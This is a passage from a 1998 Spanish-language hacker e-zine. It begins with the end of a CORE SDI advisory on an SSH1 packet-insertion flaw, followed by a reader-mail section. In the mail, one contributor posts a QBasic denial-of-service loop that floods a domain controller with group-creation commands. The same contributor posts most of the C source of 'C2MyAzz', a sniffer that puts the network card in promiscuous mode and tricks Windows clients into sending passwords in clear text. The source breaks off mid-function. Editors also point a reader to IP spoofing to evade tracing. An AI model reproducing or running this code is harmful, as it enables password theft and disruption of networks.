realizarse utilizando paquetes SSH de tipo SSH_CMSG_IGNORE. Es importante senalar que la nueva revision del protocolo SSH, propuesta y publicada como Internet Drafts [2], [3], [4] y [5] hace uso de codigos de autenticacion de mensajes (MACs) criptograficamente fuerte y no suceptibles a este ataque. Aun cuando se hallan encontrado problemas en el protocolo SSH, es todavia una alternativa mucho mas segura que el uso de las aplicaciones telnet, rsh y rlogin. [1] "The SSH (Secure Shell) Remote Login Protocol", T. Ylonen Helsinki University of Technology. November 15th 1995 (draft expired on May 15th, 1996) Included as the file ./RFC in the ssh distribution [2] "SSH Protocol Architecture", draft-ietf-secsh-architecture-01.txt.gz T. Ylonen, T. Kivinen, M. Saarinen. SSH. November 7th, 1997 [3] "SSH Connection Protocol", draft-ietf-secsh-connect-03.txt.gz T. Ylonen, T. Kivinen, M. Saarinen. SSH. November 7th, 1997 [4] "SSH Authentication Protocol", draft-ietf-secsh-userauth-03.txt.gz T. Ylonen, T. Kivinen, M. Saarinen. SSH. November 7th, 1997 [5] "SSH Transport Layer Protocol",draft-ietf-secsh-transport-03.txt.gz T. Ylonen, T. Kivinen, M. Saarinen. SSH. November 7th, 1997 (drafts expired on May 7th, 1998) Todos los Internet Drafts estan disponibles en: [6] "Simple Active Attack Against TCP", Laurent Joncheray, Merit Networks Inc., 5th USENIX Security Simposium. 1995. Impacto: ~~~~~~~~ Un atacante con acceso al canal SSH encriptado puede insertar bloque en el canal que se desencriptaran a text en claro de su eleccion pusibilitando la ejecucion de cualquier comando en el servidor SSH. Informacion para solucionar el problema ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Haga un upgrade a la version 2 del protocolo SSH, disponible al publico en los proximos dias. Usuarios de la version comercial F-Secure SSH deben contactar a Data Fellows Inc. para informacion sobre como realizar el upgrade a F-Secure SSH 2.0 Note que la version 2 del protocolo NO es compatible con las versiones anteriors y por lo tanto tambien necesitara hacer un upgrade de los clientes SSH. Mientras tanto puede realizar un upgrade a la version 1.2.25 de SSH, que soluciona el problema. La distribucion 1.2.25 puede obtenerse de: La version 1.3.5 de F-Secure SSH soluciona este problema. Si Ud. usa el paquete comercial Data Fellows SSH y tiene un contrato de soporte puede obtener F-Secure SSH de su distribuidor local. Usuarios sin contrato de soporte pueden obterner un patch que soluciona el problema de: Adicionalmente, puede obtener un patch para la distribucion libre SSH 1.2.23 y el paquete complete con el patch instalado de: A continuacion se incluyen los hashes MD5 de los archivos correspondientes MD5 (ssh-1.2.23-core.tar.Z) = fffb52122aae26c1f212c051a305a310 MD5 (ssh-1.2.23-core.tar.gz) = f9509ba0f0715637805c6b116adc0869 MD5 (ssh-1.2.23.patch) = 6bdb63d57f893907191986c5ced557ab Sistemas vulnerables: ~~~~~~~~~~~~~~~~~~~~ Todos los sistemas utilizando implementacions de la version 1.x de SSH son vulnerables. Esto incluye versiones de software hasta la 1.2.23 y F-Secure SSH 1.3.4 Para determinar que version de SSH esta corriendo su servidor utilice los siguientes comandos: $ telnet 22 Trying ... Connected to . Escape character is '^]'. SSH-1.5-1.2.23 \ / \--------- version de software |------------ version del protocolo ^] telnet> close Connection closed. $ exit Informacion adicional ~~~~~~~~~~~~~~~~~~~~~ Este problema fue descubierto por Ariel Futoransky y Emiliano Kargieman CORE SDI agradece a Tatu Ylonen y Tero Kivinen , quienes realizan el mantenimiento de SSH, por su pronta respuesta a los problemas descriptos en esta advertencia de seguridad. La informacion para la solucion del problema en los productos F-Secure de Data Fellows Inc. fue proporcionada por Olli Voima Preguntas y comentarios con respecto a esta advertencia de seguridad pueden ser enviados a: Ariel Futoransky Emiliano Kargieman Para mayor informacion sobre CORE SDI S.A. puede contactar a o visitar Si desea contactar a CORE puede utilizar la siguiente clave publica de PGP: Type Bits/KeyID Date User ID pub 1024/CF4E0CF5 1998/05/18 CORELABS -----BEGIN PGP PUBLIC KEY BLOCK----- Version: 2.6.3ia Comment: Requires PGP version 2.6 or later. mQCNAzVgfMgAAAEEAJSfJNdvCwIAc4AK0ckeimubLIwzsRVDRhjPQIOYt/7kxxio DZybr53fwMEjyT8cHXRL08i0R9rcuFeCNAez6XcalbhqUKXDcLL/cZK80CCDSCs5 tRCZGGOEBnXQIoyvbvi4gNYhBS5wUvmh3b/mvRFTvhmRrUy9m/nO/LnPTgz1AAUR tCBDT1JFTEFCUyA8Y29yZWxhYnNAY29yZS1zZGkuY29tPokAlQMFEDVgfMn5zvy5 z04M9QEBC6ED/0Szt3f54JTvkZG3ezQ8G60HvAw4/A5Ti6i3oze6jsXxzGp6pA1x i0jaZpKaUSpo0MLc7BcijMKneuUHnN3XtN5YxtFt0aEoot1MIvv4BsdeUb3x257G 3+vr8SxGk44Vm4tfuN8F/2dNo/00yYP9rd3zQ8Tl+gmr5VxnLViZIDuh =ulRg -----END PGP PUBLIC KEY BLOCK----- Copyright Notice: ~~~~~~~~~~~~~~~~~ El contenido de esta advertencia de seguridad es Copyright (C) 1998 de CORE SDI S.A. y puede ser distribuido libremente siempre y cuando se haga en forma gratuita y se otorgue el credito apropiado a los autores originales. $Id: ssh-advisory.txt.esp,v 1.7 1998/06/11 22:05:03 iarce Exp $ <ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ> ÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛ <ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ> ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿ < EL LECTOR OPINA > ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ Esta seccion esta funcionando muy bien por lo visto, pero parece mentira que incluso en el 6 numero, haya lectores que nos escriban al buzon de Hotmail (el cual ya NO es valido) y por otro lado que algunos nos envieis mail's preguntado sobre clases o incluso cosas mucho mas tontas. Lo recomendable es que penseis antes de enviarnos un mail. Es una lastima que todavia esta seccion no haya alcanzado el dinamismo que nosotros pretendiamos, pero seguiremos en nuestra cruzada de intentarlo, algun lector si que se esfuerza en ayudar como podreis comprobar mas abajo, por eso a todos esos muchas gracias. Y ahora a divertirse :) <ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ> Date: Sat, 25 Jul 1998 07:37:13 GMT From: Manuel-el oso To: conde_vampiro@usa.net Subject: guia irc hola conde, que tal? acabo de leer tu guhirc..... esta genial. Enhorabuena! Si puedes me gustaria que me contestaras a algunas preguntitas: Que herramienta hay para "dormir mi PC portatil" y que al despertar este justo en el mismo punto donde lo deje? Como puedo desensamblar un binario ejecutable para linux? existe winzip (o similar) para linux? que newsreader utilizas? que newsgroups frecuentas? muchas gracias Manu PD: aupa JJF! ,-. __ .-, --;`. ' `.' "Guantanamera....Guajira guantanamera..." / ( ^__^ ) Zzzzz!! ftp.giga.or.at/pub/hacker/Incoming/spv001.zip ; `(_`'_)' \ Skate or die! - Madrid 107.4 FM ' ` .`--'_, ; ~~`-..._)))(((.' sambam@xxxxxxxxxxxxxx <------> [ Pues thx por los cumplidos :) Sobre los portatiles, es que eso ya lo hacen, mira la caracteristicas del tuyo. Sobre Linux mira el cursillo que encontraras en este numero y sobre winzip para Linux, yo no conozco. Nunca suelo pasar por las news. ] <ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ> Date: Tue, 14 Jul 1998 09:23:23 GMT From: jaina7@xxxxxxxxxxxxxx (grieko) To: conde_vampiro@usa.net conde estas ahi? que paso bueno te escribo pues para tener a alguien que oriente en mis dudas espero respuesta ok sabes algo de novell? ok <------> [ Como ya hemos dicho muchas veces no damos clases privadas, nuestro consejo es que leas este ezine. Sobre novell pillate el FAQ DE NOVELL. http://www2.s-gimb.lj.edus.si/natan/stuff2.html http://www.nmrc.org ] <ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ> Date: Tue, 07 Jul 1998 13:51:20 GMT From: "Miguel Soto" Acabo de conocer vuestra pagina a traves de la revista Jump y creo que aparte de un buen dise¤o tiene mucho contenido que leere poco a poco. Espero que no desaparezca vuestra direccion, como otras de vuestro style, si esto ocurriese o para cualquier otra cuestion mi e-mail es rbellamy@xxxxxxxxxxxxxx , soy cuasiinformatico de carrera osease como aquel que tiene un primo en Alcala que ni es primo ni es na. Estoy en el ordenador de un amigo asi que espero que no le echeis mucha cuenta al remitente. Saludos de un Sevillano fan de la informatica y de comun acuerdo con vuestra filosofia. Roberto. <------> [ ¨ En la revista Jump ?, es la primera noticia que tengo que salimos alli, espero que hayan sido buenas criticas :) Nosotros no pensamos desaparecer si no todo lo contrario nos expandimos, o sea que no te preocupes y siempre estaremos por Inet. ] <ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ> From: Split To: conde_vampiro@usa.net Subject: Peticion de un documento txt Holas, vuelvo a escribiros ya que no he recibido respuesta. Os pedia un documento titulado "La Superguia del Hacker" por Nobody (hackear desde win95). Ya que he estado buscando este doc pero no he podido encontrarlo, puesto que hablaron de el en el n 4 de su ezine, en concreto referente a un mail :))) Sin mas y dandote las gracias Split <------> [ Garantizado para el n§7 y encima la Version Deluxe :) ] <ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ> Date: Wed, 10 Jun 1998 02:16:55 GMT From: "Angel torrez" To: conde_vampiro@usa.net Subject: Ayuda Urgente Estimado conde Vampiro permitame saludarle y desearle una feliz noche (por que me imagino como es usted vampiro solo saldra por las noches) bueno como introduccion quiero decirle muchas gracias por todos sus escritos nos han servido de mucho, tambien ese texto de hack de una Web estaba muy bien, pero nosotros somos un grupo de personas de Nicaragua que estamos iniciando en este maravilloso mundo del hackers, por lo cual nosotros pedimos su ayuda para que nos guie en esta dificil tarea, seremos sus aprendices, es cierto que una de las reglas es no preguntar por que supuestamente lo sabemos todo, pero hemos roto esa regla para abocarnos a usted conde para que nos ense¤e a dar unas que otras mordidas en la net, para iniciar tenemos una peque¤a duda, cuando nosotros nos conectamos por telnet al servidor xxxxx este servidor no capta nuestro numero de IP, por lo cual ya nos pueden agarrar, esa es nuestra primera pregunta. Espero que no la mires tan TONTA. <------> [ Pues como siempre decimos lee nuestros ezines y documentos :) No entiendo bien tu pregunta, supongo que te refieres a que el server pilla tu IP y quieres saber como evitar eso, pues tienes muchas maneras, IP-SPOOFING es una de ellas y ahora piensa un poco tu :) No existen las preguntas tontas si no preguntas mal formuladas en todo caso ;-) ] <ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ> Date: Fri, 31 Jul 1998 16:00:33 GMT From: To: jjf_team@usa.net Subject: ............ .............ninguno de tus links de phreak sirven pues e querido bajar algunos programas y me sale con que no lo encuentra......que paso pues.... hay mandame un E-mail cuando las pongan a funcionar...K..... <------> [ Ya decimos que actualizamos los link's lo mas rapido posible pero el web es muy dinamico, por tanto complicado estar a la ultima. ] <ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ> From: "Miguel Celis" To: jjf_team@usa.net Subject: saludos desde colombia mis felicitaciones por esa excelente y enviciante pagina. quisiera comunicarte una inquietud que tengo; fijate como solo estoy incursionando al tema de los phreaker y como tengo ese interes tan imenso por conocer lo que esconde en sus entra¤as este nuevo (para mi por lo menos) mundo quisiera que pusieras mas archivos de textos refiriendose a este tema ya sea informacion general o especifica. Si haces caso a mi peticion, eres tu muy amable. saludos a tus compa¤eros hackers, crackers, phreakers y todo lo que se invenmten nuevo que termine en "kers". se despide !el 11! <------> [ Pues thx, ya hemos publicado algo de phreak y tienes muchas cosas en nuestro web, por lo que recomiendo que te pases por la seccion PHREAK. ] <ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ> From: Nain To: jjf_team@usa.net Subject: pregunta hola, acabo de descubrir vuestra revista y me la quiero bajar... todos los n§ para leerla tranquilamente, sin embargo tengo un problema, siempre que intento bajarmela, nunca esta completa... siempre las frases estan cortadas por la mitad. que puedo hacer para solucionar esto? Os ruego me respondais rapidamente porque tengo muchas ganas de terminar de leerla. Un saludo.udo. <------> [ Pues ya hemos puesto un zip con el primer volumen entero y no pinches encima del ezine si no que clickea con el mouse y dale al boton derecho para salvar el fichero :) ] <ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ> From: "A.A.A" Subject: intereses Quisiera saber porque mas de la mitad de lugares que poneis en vuestras listas no estan disponibles. Os los han cerrado o censurado o simplemente no teneis esa informacion. Vais a seguir publicando mas i-zine en vuestra web? Podrias mandarme direcciones de paginas web para principiantes al hacking, phreaking, y virus ya me cuesta encontrar paginas completas da igual que esten en ingles. <------> [ Ya hemos dicho que es dificil el asunto de los linkïs. ¨¨ Quien dice que no vamos a publicar mas ?? Y mas cosas que estamos haciendo ;-) Para ver webïs pasate por la seccion LINKS ] <ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ> From: Daniel R. To: jjf_team@usa.net Subject: Pregunta Hola acabo de visitar su pagina y me parecio que es una de las mejores que he visto pero tengo una pregunta que hacerles: Quisiera poder conseguir el username y el pasword de una pagina (www.anacam.com). Pude bajar "john the ripper vl.4" desde su pagina pero no puedo instalarlo, hay un archivo de nombre "install" pero no le entiendo como puedo hacerle para poder arrancar el programa. Me podrian ayudar a instalar este programa ho recomendarme uno mas facil de usar. DE antemano Muchas Gracias ATTE. Daniel R. <------> [ Thx pero NO nos dedicamos a hackear webïs a peticion de los lectores. Pasate por nuestra seccion CRACK y pillate el John, pues es raro porque se instala bien, vuelve a probar y leete la ayuda :) ] <ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ> From: Nombre y apellidos To: jjf_team@usa.net Subject: subscribe He intentado bajarme los Zines pero se corta a medio, podeis comprimirlos todos en un zip y enviarmelos a jmt1@xxxxxxxxxxxxxx Gracias. <------> [ No podemos enviarlos a todos los lectores, ya hemos puesto el primer volumen en zip y unos cuantos mailïs arriba explicamos como lo tienes que poder bajar correctamente. ] <ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ> From: Elena To: jjf_team@usa.net Subject: {CyBoRg} Continuacion respuesta Bueno sigo con la respuesta a DANY, por aki tengo un programilla en qbasic que es un DoS, te lo pongo para que veas, este DoS lo que hace es que empieza a crear grupos locales en un PDC. Asi que en un rato de na el PDC esta saturado de grupos y se llena el HD y se queda colgao, (me he pasao explicando lo que hace) ------------ Codigo Fuente --------------------------------------------------- DIM var AS INTEGER DIM hack1 AS STRING DIM hack2 AS STRING DO WHILE var < 10000000 var = var + 1 hack1 = "hack" + LTRIM$(STR$ (var)) hack2 = "net localgroup " + hack1 + " /add /domain" SHELL hack2 LOOP ------------ FIN ------------------------------------------------------------- Bueno, ya si que os dejo de una vez, joder que calor........... {CyBoRg} SHG Security Group <------> [ Pues muchas gracias por ayudar con esta seccion :) ] <ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ> From: Elena To: jjf_team@usa.net Subject: {CyBoRg} - SHG Security - Hi, de nuevo, os envio este mensaje para responder a "DANY" que preguntaba sobre troyanos para NT en visual basic o pascal, le digo que es muy dificil encontrar algo en estos lenguajes, a no ser que lo hagas tu. Nosotros hemos llegado a hacer un programilla de seguridad para NT en visual para chapar cosas del registro, aunque lo del regedit es un co¤azo y mas si se lo haces a alguien remotamente :))). Bueno aqui te pongo el fuente de un programa para capturar pass en texto plano es en C, pero bueno, haber si encuentro otro troyano que tenia, lo he perdido entre todas las cosas que tengo y si lo encuentro lo envio luego. ------------ Codigo Fuente --------------------------------------------------- /* C2MyAzz - Sirve para capturar login y pass en texto plano */ #include #include #include #include #pragma pack(1) #include "c2myazz.h" #define MAXENTRIES 20 // Function prototypes void _loadds _far CntrlEntryPt (); void _loadds _far RxISR (); u8 stuffit(IPpac _far *, PID _far *, u8 _far *); void _loadds _far TXCompleteESR(); void init(); void _loadds _far grabit(); // Global data void (_far * LSLInitEntryPt)(); //ptr to func that returns a ptr InfoBlock LSLInfoBlock; // LSL Info block - 2 ptrs RxNode Rnode; u16 BoardNum; ODIStat Rtn; void (_far * LSLProtocolSupportEntryPt)(); // ptr LSL funct void (_far * LSLGenServicesEntryPt )(); void (_far * MLIDSupportEntryPt)(); void (_far * MLIDControlEntryPt)(); u8 _far * signature; union REGS regsin; union REGS regsout; struct SREGS segs; configtbl cfgtab; stattbl stattab; EventCB XmitECB=3d{0}; u8 immAddr[6]; EventCB _far * ECB; LookAhead _far * LkAhead; IPpac _far * pacptr; u16 CurEntry =3d 0; // index for big buffer IPInfo Data [MAXENTRIES]; // big buffer for captured data u16 DataEnd; u8 sendOK; u8 getpkt; EventCB _far * RcvECB; //************************************************************************* // // Build CntrlEntryPt as required by LSL. // upon entry: // bx =3d function number (0-8) // cx =3d parameter as required by bx // es:si =3d ptr as required by bx // upon exit: // ax =3d completion code ( 0 =3d successful) // es:si =3d as required by bx // registers DS BP ES SI SS SP preserved // //******************************************************************* void _loadds _far CntrlEntryPt () { _asm { mov ax, 0 ; preset AX to success test bx, 0 je getcfg test bx, 1 je getstat test bx, 2 je LSLbind test bx, 3 je unbind test bx, 4 je dereg test bx, 5 je promis test bx, 6 je reserve test bx, 7 je reserve test bx, 8 je manage jmp error getcfg: mov ax, SEG cfgtab mov es,ax mov ax,0 mov si, OFFSET cfgtab jmp goback getstat: mov ax,SEG stattab mov es,ax mov ax,0 mov si, OFFSET stattab jmp goback LSLbind: mov ax, 08009h jmp goback unbind: jmp goback dereg: jmp goback promis: jmp goback reserve: jmp error manage: jmp goback error: mov ax, 08008h ; bad command jmp goback goback: } } //***************************************************************** // // Rx ISR - called by LSL // // Grabs the lookahead buffer from LSL and passes it to Stuffit // If the packet is of intereset, call LSL and get an ECB from // LSL's pool, sends to grabit // // //****************************************************************** #pragma check_stack(off) void _loadds _far RxISR () { _asm { mov word ptr LkAhead, di pop ax ; get callers ds into ax push ax mov word ptr LkAhead+2, ax push di push si push es } // Check to see if we want this packet getpkt=3d(stuffit ((IPpac _far *)LkAhead->DataPtr, &LkAhead->ProtocolID, &(LkAhead->MediaHdr[6]))); if(getpkt =3d=3d 0) _asm { pop es pop si pop di mov ax, 8001h ; pass to next scanner or ax, ax ; set ZF based on value of AX } else { _asm { mov bx,0 ;Get an ECB from LSL's pool call far ptr LSLProtocolSupportEntryPt mov word ptr[RcvECB],si mov word ptr[RcvECB+2],es } // Fill out the necessary fields in the ECB RcvECB->BoardNum=3d0; RcvECB->ProtocolID[0]=3d0; RcvECB->ProtocolID[1]=3d0; RcvECB->ProtocolID[2]=3d0; RcvECB->ProtocolID[3]=3d0; RcvECB->ProtocolID[4]=3d8; RcvECB->ProtocolID[5]=3d0; RcvECB->ProtocolNum=3d0xABCD; RcvECB->DataLen=3d1480; RcvECB->Frag1Len=3d1480; RcvECB->FragCnt=3d1; RcvECB->ECBISR=3dgrabit; RcvECB->Frag1Addr=3d((u8 far *)((void far *)RcvECB)+(((sizeof(EventCB)+3)>> 2) << 2)); _asm { add sp,4 mov word ptr ss:[bp-4],si xor ax, ax ;clear AX and reset ZF pop di } } } //************************************************************* // Init - checks for supporting software and hardware // //************************************************************* void init() { u16 i; u16 ComCode; //***************************************************************** // Initialization routines // Check to see if LSL is loaded (int vector 2F is viable) regsin.x.ax =3d 0x352f; intdosx ( ®sin, ®sout, &segs); if (((regsout.x.bx | segs.es ) =3d=3d 0) || ((regsout.x.bx & segs.es ) =3d=3d -1)) { printf ("C2MyAzz: LSL not loaded. Exiting.\n "); exit; } // Locate the LSL intial entry pt. Note that we're scanning // for TSRs, starting at C0 to FF. for ( i =3d 0xC0; i < 0xFF; i ++) { regsin.h.ah =3d i; regsin.h.al =3d 0; int86x (0x2F, ®sin, ®sout, &segs); if ( regsout.h.al =3d=3d 0xFF) // something is installed, check it { (long)signature =3d (long)regsout.x.si ; // ptr to LSL id (long)signature =3d ((long)segs.es << 16) | (long)signature; if (_fstrncmp ((u8 _far *)signature, (u8 _far *)"LINKSUP$", 8)) // check for LSL id continue; // not LSL, continue else { (long)LSLInitEntryPt =3d (long)regsout.x.bx ; (long)LSLInitEntryPt =3d (long)LSLInitEntryPt | ((long)regsout.x.dx << 16); break; // got LSL exit loop } } } if (!LSLInitEntryPt) { printf ("C2MyAzz: LSL is not loaded \n "); exit; } LSLInfoBlock.LSLAPI =3d 0; // call the LSL initial entry pt to fill in the LSL info block _asm { push es push ds mov ax, SEG LSLInfoBlock mov es, ax mov si, OFFSET LSLInfoBlock ; ES:SI =3d ptr to info block mov bx, 4 ; bx =3d req code 4 call far ptr LSLInitEntryPt ; get LSL info block pop ds pop es } // move function ptrs from info block (optional) LSLProtocolSupportEntryPt =3d (void (_far *)())LSLInfoBlock.LSLAPI; LSLGenServicesEntryPt =3d (void (_far *)())LSLInfoBlock.GSAPI; MLIDSupportEntryPt =3d (void (_far *)())LSLInfoBlock.MLIDAPI; // Assume that we're only dealing with one board BoardNum =3d 0; // Get MLID Control Entry point for later use _asm { push es push ds mov ax, BoardNum mov bx, 012h ; Get MLID Control Entry Pt call far ptr LSLProtocolSupportEntryPt mov word ptr [MLIDControlEntryPt], si mov word ptr [MLIDControlEntryPt +2], es pop ds pop es mov ComCode, ax } if (ComCode !=3d 0) { printf ("C2MyAzz: cannot get MLID control entry pt rtn =3d %x. Is your MLID loaded? \n", ComCode); exit; } // Set the look ahead size of MLID to 128 bytes _asm { push es push ds mov ax, BoardNum mov bx, 9 ;set look ahead size mov cx, 80h call far ptr MLIDControlEntryPt pop ds pop es mov ComCode, ax } if (ComCode !=3d 0) { printf ("C2MyAzz: cannot set look ahead size to 128 rtn =3d %x \n", ComCode); exit; } printf ("C2MyAzz: Lookahead set to 128 bytes \n"); // Register the RX prescanner stack with LSL // init RX Node CB Rnode.boardnum =3d BoardNum; Rnode.position =3d LAST_MUST; Rnode.ISR =3d &RxISR; Rnode.StackID =3d 0xABCD; Rnode.ControlEntryPt =3d &CntrlEntryPt; Rnode.PacFilterMsk =3d 0xFFFF; _asm { push es push ds mov ax,ds mov es,ax mov si, OFFSET Rnode mov bx, 01Ch ;register the RX prescanner call far ptr LSLProtocolSupportEntryPt pop ds pop es mov ComCode, ax } if (ComCode !=3d 0) { printf("C2MyAzz: cannot register RX prescanner rtn =3d %x \n", ComCode); exit; } printf("C2MyAzz: Receive prescanner now registered \n"); // Enable promiscuous mode on the adapter so the we will receive all packets _asm { push es push ds mov ax, BoardNum mov bx, 0ah ;set promiscuous mode mov cx, 1 ;all frames call far ptr MLIDControlEntryPt pop ds pop es mov ComCode, ax } if (ComCode !=3d 0) { printf("C2MyAzz: cannot set board in promiscuous mode rtn =3d %x \n", ComCode); printf(" Does your board support promiscuous mode? \n"); exit; } printf ("C2MyAzz: Board now in promiscuous mode \n"); // Reset prescan stack to accept all frames i=3dRnode.StackID; // Cheat the assembler _asm { push es push ds mov ax, BoardNum mov bx, 02bh ;modify stack filter mov cx, i mov dx, 0ffffh ;take everything call far ptr LSLProtocolSupportEntryPt pop ds pop es mov ComCode, ax } if (ComCode !=3d 0) { printf("C2MyAzz: cannot set stack filter rtn =3d %x \n", ComCode); exit; } } //***************************************************************************** // Uninit - deregisters the prescan stack //***************************************************************************** void uninit(void) { u16 ComCode; _asm { push es push ds mov ax,ds mov es,ax mov si, OFFSET Rnode mov bx, 01Fh ;Deregister the RX prescanner call far ptr LSLProtocolSupportEntryPt pop ds pop es mov ComCode, ax } if (ComCode !=3d 0) { printf("C2MyAzz: cannot deregister RX prescanner rtn =3d %x \n", ComCode); return; } } u8 stuffit(IPpac _far *pacptr, PID _far *pid, u8 _far *immAddr) { //Check to see if this is an SMB within IP if (_fstrncmp((void far *)pacptr->x.SMB.IDString, (void far *) "SMB", 3) !=3d 0) return(0); //Is this packet a SMB Neg Request? if(pacptr->x.SMB.FunctionCode < 0x72) return(0); //Is this packet creating a server connection? if(pacptr->x.SMB.FunctionCode > 0x73) return(0); //Must be a packet of interest. return(1); } void _loadds _far grabit(void) { //Grab what we need from the packet if (CurEntry < MAXENTRIES) // test for overflow { pacptr=3d(IPpac _far *)RcvECB->Frag1Addr; Data[CurEntry].size=3d((pacptr->length >> 8) & 0x00FF) | ((pacptr->length << 8)& 0xFF00); _fmemmove((void far *) Data[CurEntry].data, (void far *) pacptr, Data[CurEntry].size); _fmemmove((void far *) &Data[CurEntry].pid, (void far *) RcvECB->ProtocolID, sizeof(PID)); _fmemmove((void far *) Data[CurEntry].immAddr, (void far *) RcvECB->ImmAddr, 6); _fmemmove((void far *) &Data[CurEntry].type, (void far *)pacptr->x.SMB.FunctionCode, 2); _asm { mov bx,1 ;Return ECB to LSL pool mov si, word ptr[RcvECB] mov es, word ptr[RcvECB+2] call far ptr LSLProtocolSupportEntryPt xor ax, ax ;clear AX and reset ZF } CurEntry++; // bump counter for next packet } } #pragma check_stack(on) //************************************************************* // Empty transmit complete ESR for LSL // //************************************************************* void _loadds _far TXCompleteESR() { // Stack is ready for the next packet sendOK=3d0; } //************************************************************* // // Main processing of the packet occurs here. // Setup the forged ECB, then loop until a packet comes in // //************************************************************* main () { IPpac *ECBData; u8 buffer[256]; ODIStat Rtn; u16 i; u16 ComCode; u16 j; ODIStat Stat; int ch; u32 SourceAddress; u32 DestAddress; u16 sourcePort; u16 destPort; u32 seqNum; u32 ackNum; u32 nextseqNum; u16 MuxID; u16 TreeID; u16 ProcID; u8 type; PID pid; char password[24]; char username[16]; u8 commandresp; u32 sum; u16 *ptr; u16 pktlen; u8 foundpw; u8 pwlen; u8 wstype; // 0 if 95, 1 if NT printf("C2MyAzz - Tricks Microsoft Networking clients to send their password as\n"); printf(" clear text. Displays a username/password combination. \n"); printf(" C2MyAzz requires LSL and a promiscuous mode LAN driver.\n\n"); printf(" Use at your own risk. Read Microsoft's CIFS documentation\n"); printf(" for more NT security holes. Copyright(c) 1997 \n\n\n"); // Setup for prescan init(); printf("C2MyAzz: All packets will now be received\n"); printf("C2MyAzz: Ready to scan for passwords\n"); printf("C2MyAzz: (press any key to exit)\n\n\n"); // Setup some of the static ECB information so that we don't waste cycles // when processing the packets XmitECB.Frag1Addr =3d buffer; ECBData =3d (IPpac *)buffer; XmitECB.DataLen =3d 